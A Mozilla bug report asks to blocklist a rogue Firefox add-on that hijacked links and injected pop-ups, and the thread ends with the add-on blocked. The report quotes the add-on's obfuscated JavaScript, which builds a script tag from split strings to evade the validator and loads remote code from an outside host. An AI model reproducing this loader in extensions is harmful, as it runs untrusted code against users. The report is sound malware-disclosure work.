Closed
Bug 1231010
Opened 9 years ago
Closed 8 years ago
Rogue YouTube Video Downloader addon hijacking links and injecting pop ups
Categories
(Toolkit :: Blocklist Policy Requests, defect)
Toolkit
Blocklist Policy Requests
Tracking
()
RESOLVED
FIXED
People
(Reporter: Swarnava, Assigned: jorgev)
References
()
Details
The unlisted addon YouTube Video Downloader is currently executing remote code to hijack links and inject pop up ads. Homepage[http://addoncrop.com/youtube_video_downloader/]. This has been brought to attention in the following post: https://www.reddit.com/r/firefox/comments/3vl3yz/getting_tons_of_popup_tabs_all_of_a_sudden_with/1 A quick inspection to its source code already shows a red flag in its include folder contents, namely the link_modifier.js file which contains the following code in its entirity: var s = document.createElement('scr'+'ipt'); s.type = 'text/ja'+'va'+'scr'+'ipt'; s.src = 'http://www.sourcecrab.com/YouTube_Extend/ff_http_extend.js'; document.getElementsByTagName('head')[0].appendChild(s); It is evident that the developer intended to bypass the AMO validator (when it was running for unlisted addons) by creating a dangerous element via string concatenation. In this file it loads and executes an external script. I didn't find any notice/content policy informing the user of this malware-like behavior and don't think needed to inspect more of the source code after finding that file. Discouse link:- https://discourse.mozilla-community.org/t/rogue-youtube-video-downloader-addon-hijacking-links-and-injecting-pop-ups/5784/1
I can't seem to find this addon on AMO. Is it only hosted from a 3rd party?
Comment 2•9 years ago
|
||
Right link form reddit board is http://www.iks.hs-merseburg.de/~gruni/netfaq/homepage-nutzen.html Seems that it is an unlisted addon and only hosted from 3rd party
(In reply to Lars Gusowski [:lagu] from comment #2) > Right link form reddit board is > http://www.iks.hs-merseburg.de/~gruni/netfaq/homepage-nutzen.html > > Seems that it is an unlisted addon and only hosted from 3rd party Thanks Lars, our admins are in an all hands meeting and we will get to them asap
Comment 4•9 years ago
|
||
https://www.reddit.com/r/firefox/comments/3vl3yz/getting_tons_of_popup_tabs_all_of_a_sudden_with/ it the right link :( not sure why i posted a link to the tespage from an university :/
Assignee | ||
Comment 5•8 years ago
|
||
Sorry for the delay. I contacted the developers and will give them some time to respond.
Assignee: nobody → jorge
Assignee | ||
Comment 6•8 years ago
|
||
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i1077
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Updated•8 years ago
|
Product: addons.mozilla.org → Toolkit
You need to log in
before you can comment on or make changes to this bug.
Description
•